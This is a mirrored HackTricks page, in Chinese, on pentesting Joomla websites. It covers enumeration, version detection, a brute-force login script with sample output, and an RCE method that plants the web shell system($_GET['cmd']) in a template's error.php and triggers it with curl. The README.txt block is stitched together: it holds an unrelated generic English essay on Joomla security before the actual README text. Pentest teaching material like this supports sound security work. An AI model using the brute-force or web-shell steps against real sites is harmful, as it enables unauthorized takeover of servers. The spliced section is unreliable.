Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-27 07:01:09 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/joomla.md

139 lines
5.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Joomla
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* 您在**网络安全公司**工作吗想要在HackTricks中看到您的**公司广告**?或者想要访问**PEASS的最新版本或下载HackTricks的PDF**?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFTs收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我。
* **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享您的黑客技巧**。
</details>
### Joomla统计信息
Joomla收集一些匿名的[使用统计信息](https://developer.joomla.org/about/stats.html)例如Joomla、PHP和数据库版本的分布以及Joomla安装中使用的服务器操作系统。这些数据可以通过他们的公共[API](https://developer.joomla.org/about/stats/api.html)查询。
```bash
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}
```
## 枚举
### 发现/足迹
* 检查 **meta**
```bash
curl https://www.joomla.org/ | grep Joomla | grep generator
<meta name="generator" content="Joomla! - Open Source Content Management" />
```
* robots.txt
```
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
```
* README.txt
## Joomla
### Introduction
Joomla is a popular open-source content management system (CMS) written in PHP. It is used to build and manage websites of all sizes and types.
### Pentesting Joomla
When pentesting Joomla websites, some common vulnerabilities to look for include:
1. Outdated Joomla versions
2. Vulnerable extensions
3. Weak administrator passwords
4. SQL injection
5. Cross-site scripting (XSS)
6. File inclusion vulnerabilities
### Tools for Pentesting Joomla
Some tools that can be used for pentesting Joomla websites include:
- **JoomScan**: A tool specifically designed for Joomla pentesting.
- **OWASP Joomla Vulnerability Scanner**: Helps in identifying security issues in Joomla websites.
- **SQLMap**: Useful for detecting and exploiting SQL injection vulnerabilities.
- **Burp Suite**: Helps in intercepting and modifying web traffic to test for vulnerabilities.
### Best Practices for Securing Joomla
To secure Joomla websites, consider implementing the following best practices:
1. Keep Joomla and its extensions up to date.
2. Use strong and unique passwords for administrators.
3. Regularly backup website data.
4. Implement proper file permissions.
5. Disable unnecessary services and components.
6. Use HTTPS to encrypt data transmission.
By following these best practices and conducting regular security assessments, you can help protect Joomla websites from potential attacks.
```
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
```
### 版本
***/administrator/manifests/files/joomla.xml** 中可以看到版本。
***/language/en-GB/en-GB.xml** 中可以获取 Joomla 的版本。
***plugins/system/cache/cache.xml** 中可以看到一个大致的版本。
```bash
droopescan scan joomla --url http://joomla-site.local/
```
### Brute-Force
您可以使用此[脚本](https://github.com/ajnik/joomla-bruteforce)尝试对登录进行暴力破解。
```shell-session
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
admin:admin
```
## RCE
如果你成功获取了**管理员凭证**,你可以通过添加一小段**PHP代码**来实现**RCE**。我们可以通过**自定义**一个**模板**来实现这一点。
1. 在`Configuration`下方点击**`Templates`**以打开模板菜单。
2. 点击一个**模板**名称。让我们选择`Template`列标题下的**`protostar`**。这将带我们到**`Templates: Customise`**页面。
3. 最后,你可以点击一个页面以查看**页面源代码**。让我们选择**`error.php`**页面。我们将添加一个**PHP 一行代码来执行代码**,如下所示:
```php
system($_GET['cmd']);
```
4. **保存并关闭**
5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`
Reference in a new issue View git blame Copy permalink